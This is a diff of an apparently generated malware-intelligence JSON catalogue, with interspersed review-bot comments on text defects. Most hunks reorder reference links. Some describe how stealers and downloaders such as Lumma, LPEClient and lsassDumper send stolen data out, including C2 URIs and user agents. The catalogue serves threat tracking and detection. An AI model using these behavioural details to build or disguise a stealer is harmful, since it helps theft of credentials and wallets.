 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
 "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
 "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
 ],
 "synonyms": [],
@@ -31950,10 +33459,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey",
- "https://www.mandiant.com/resources/apt41-us-state-governments",
 "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
- "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/",
- "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html"
+ "https://www.mandiant.com/resources/apt41-us-state-governments",
+ "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html",
+ "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/"
 ],
 "synonyms": [
 "PortReuse"
@@ -31977,13 +33486,32 @@
 "uuid": "1efd4902-ff9e-4e71-8867-6eddb9bc456c",
 "value": "LOWZERO"
 },
+ {
+ "description": "LPEClient is an HTTP(S) downloader that expects two command line parameters: an encrypted string containing two URLs (a primary and a secondary C&C server), and the path on the victim's file system to store the downloaded payload. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, type and number of processors, computer manufacturer, product name, major and minor Windows versions, architecture, memory information, installed security software and the version of the ntoskrnl.exe from its version-information resource.\r\n\r\nLPEClient uses specific 32-bit values to represent its execution state (0x59863F09 when connecting via the WinHTTP interface, 0xA9348B57 via WinINet), or the nature of HTTP requests to the C&C servers (0xF07D6B34 when sending system information, 0xEF8C0D51 when requesting a DLL payload, 0xCB790A25 when reporting the successful loading of the DLL, 0xD7B20A96 when reporting the state of the the DLL execution). As the final step, malware looks for the export CloseEnv and executes it. \r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient",
+ "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf",
+ "https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf",
+ "https://vblocalhost.com/uploads/VB2021-Park.pdf",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://securelist.com/lazarus-threatneedle/100803/"
+ ],
+ "synonyms": [
+ "LPEClientTea"
+ ],
+ "type": []
+ },
+ "uuid": "754c8f79-743b-49fc-971e-bcd60edef9d8",
+ "value": "LPEClient"
+ },
 {
 "description": "This in Go written malware is lsass process memory dumper, which was custom developed by threat actors according to Security Joes. It has the capability to automatically exfiltrate the results to the free file transfer service \"transfer.sh\".",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lsassdumper",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf",
- "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/"
+ "https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/",
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -31992,7 +33520,7 @@
 "value": "lsassDumper"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detecci\u00f3n de Lu0bot, ya que no causa s\u00edntomas significativos, como una grave disminuci\u00f3n del rendimiento del sistema.\r\n\r\nEl programa malicioso funciona como un recolector de telemetr\u00eda. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot",
@@ -32022,8 +33550,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lucifer",
- "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/",
- "https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/"
+ "https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/",
+ "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/"
 ],
 "synonyms": [],
 "type": []
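Review bot: The added LPEClient description has a doubled word, `reporting the state of the the DLL execution`, and its string ends in ` \r\n` after `executes it.`, so the value carries trailing whitespace plus a dangling CRLF; the first paragraph likewise ends with a space before `\r\n\r\n`. These arrive with the new entry and are not touched by the commit, so `...the state of the DLL execution)` and trimming the trailing ` \r\n` would be the fix, presumably upstream if this file is generated.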
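Review bot: The Lu0bot description added here is Spanish text behind an English `According to PCrisk,` lead-in, whereas every other description visible in this diff is English, so consumers rendering or full-text searching the cluster get a mixed-language entry. If the PCrisk write-up also exists in English it should be quoted from there; otherwise the entry should be marked as a translation or left empty until an English summary is available.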
@@ -32036,13 +33564,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
 "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
- "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
 "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
 "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
 "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html"
 ],
 "synonyms": [
@@ -32054,17 +33582,20 @@
 "value": "Luminosity RAT"
 },
 {
- "description": "Lumma is an information stealer written in C, sold as a Malware-as-a-Service by LummaC on Russian-speaking underground forums and Telegram since at least August 2022. Lumma's capabilities are those of a classic stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.",
+ "description": "Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor \"Shamel\", who goes by the alias \"Lumma\". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the URI \"/c2sock\" and the user agent \"TeslaBrowser/5.5\".\"",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma",
- "https://twitter.com/sekoia_io/status/1572889505497223169",
- "https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/",
- "https://twitter.com/Ishusoka/status/1614028229307928582",
- "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx",
- "https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer",
 "https://twitter.com/fumik0_/status/1559474920152875008",
- "https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7"
+ "https://twitter.com/sekoia_io/status/1572889505497223169",
+ "https://www.esentire.com/blog/the-case-of-lummac2-v4-0",
+ "https://twitter.com/Ishusoka/status/1614028229307928582",
+ "https://outpost24.com/blog/everything-you-need-to-know-lummac2-stealer",
+ 
"https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7",
+ "https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer",
+ "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/",
+ "https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx"
 ],
 "synonyms": [
 "LummaC2 Stealer"
@@ -32158,9 +33689,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit",
- "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html",
+ "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/",
 "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html",
- "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/"
+ "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html"
 ],
 "synonyms": [
 "Adneukine",
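Review bot: The rewritten Lumma description in the `@@ -32054` hunk ends with a stray escaped quote, `... and the user agent \"TeslaBrowser/5.5\".\"",`, which leaves a dangling `"` at the end of the rendered text. The JSON stays valid because the sequence is escaped, so no validator will catch it; the tail should read `... the user agent \"TeslaBrowser/5.5\".",`. The object's `uuid` and `value` lines fall outside the hunk.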
@@ -32190,11 +33721,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv",
- "https://github.com/baderj/domain_generation_algorithms/blob/master/m0yv/dga.py",
- "https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py",
 "https://youtu.be/3RYbkORtFnk",
- "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html"
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
+ "https://github.com/baderj/domain_generation_algorithms/blob/master/expiro/dga.py",
+ "https://github.com/baderj/domain_generation_algorithms/blob/master/m0yv/dga.py",
+ "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/"
 ],
 "synonyms": [],
 "type": []
@@ -32207,9 +33738,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.macaw",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/",
 "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.bleepingcomputer.com/news/security/evil-corp-demands-40-million-in-new-macaw-ransomware-attacks/"
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp"
 ],
 "synonyms": [],
 "type": []
@@ -32218,17 +33749,17 @@
 "value": "Macaw"
 },
 {
- "description": "According to ESET, Machete’s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64‑encoded text that corresponds to AES‑encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it’s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.",
+ "description": "According to ESET, Machete\u2019s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64\u2011encoded text that corresponds to AES\u2011encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. 
In short, this application provides geolocation coordinates when it\u2019s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete",
- "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html",
- "https://securelist.com/el-machete/66108/",
- "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/",
- "https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf",
- "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america",
 "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html"
+ "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html",
+ "https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf",
+ "https://securelist.com/el-machete/66108/",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html",
+ "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/",
+ "https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america"
 ],
 "synonyms": [
 "El Machete"
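Review bot: The re-escaped Machete description keeps U+2011 (non-breaking hyphen) in `base64\u2011encoded` and `AES\u2011encrypted`, so a plain-text search for "base64-encoded" or "AES-encrypted" against this file or an imported galaxy will not match those phrases. The hunk only converts the literal characters of the old line into `\u` escapes, so the character is inherited rather than introduced here, but the sync is the natural place to normalise it to an ASCII hyphen: `base64-encoded` and `AES-encrypted`. The rest of the hunk is a reorder of the refs list.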
@@ -32268,9 +33799,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie",
- "https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/",
+ "https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d",
 "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01",
- "https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d"
+ "https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/"
 ],
 "synonyms": [],
 "type": []
@@ -32283,9 +33814,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat",
- "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.youtube.com/watch?v=nUjxH1gW53s",
+ "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF",
+ "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html",
 "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/",
- "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html"
 ],
 "synonyms": [],
 "type": []
@@ -32298,26 +33831,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber",
- "https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware",
- "https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/",
- "https://asec.ahnlab.com/en/41889/",
- "https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/",
 "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372",
- "https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/",
- "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/",
- "https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/",
- "https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/",
- "https://www.youtube.com/watch?v=lqWJaaofNf4",
 "https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/",
- "https://asec.ahnlab.com/en/19273/",
- "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/",
+ "https://asec.ahnlab.com/en/41889/",
 "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/",
- "http://asec.ahnlab.com/1124",
- "https://asec.ahnlab.com/en/30645/",
- "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
- "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "https://hshrzd.wordpress.com/2023/03/30/magniber-ransomware-analysis/",
+ "https://www.malwarebytes.com/blog/news/2018/07/magniber-ransomware-improves-expands-within-asia",
+ "https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/",
+ "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/",
+ 
"https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/",
- "https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/"
+ "https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware",
+ "https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/",
+ "https://www.bleepingcomputer.com/news/security/magniber-ransomware-gang-now-exploits-internet-explorer-flaws-in-attacks/",
+ "https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/",
+ "https://asec.ahnlab.com/en/19273/",
+ "https://decoded.avast.io/janvojtesek/exploit-kits-vs-google-chrome/",
+ "https://asec.ahnlab.com/en/30645/",
+ "https://www.youtube.com/watch?v=lqWJaaofNf4",
+ "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "http://asec.ahnlab.com/1124",
+ "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/"
 ],
 "synonyms": [],
 "type": []
@@ -32330,68 +33864,68 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto",
- "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf",
- "https://lopqto.me/posts/automated-dynamic-import-resolving",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/",
- "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/",
- "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/",
- "https://www.youtube.com/watch?v=q8of74upT_g",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas",
- "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/",
- 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/",
- "https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/",
- "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/",
- "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
- "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware",
- "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/",
- "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html",
- "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/",
- "https://zengo.com/bitcoin-ransomware-detective-ucsf/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://zero2auto.com/2020/05/19/netwalker-re/",
- "https://www.ic3.gov/media/news/2020/200929-2.pdf",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
- "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/",
- "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game",
+ 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
 "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
- "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware"
+ "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/",
+ "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware",
+ "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/",
+ "https://www.ic3.gov/media/news/2020/200929-2.pdf",
+ "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download",
+ "https://lopqto.me/posts/automated-dynamic-import-resolving",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/",
+ "https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas",
+ "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/",
+ "https://zengo.com/bitcoin-ransomware-detective-ucsf/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/",
+ "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware",
+ "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million",
+ "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/",
+ 
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://www.youtube.com/watch?v=q8of74upT_g",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware",
+ "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html",
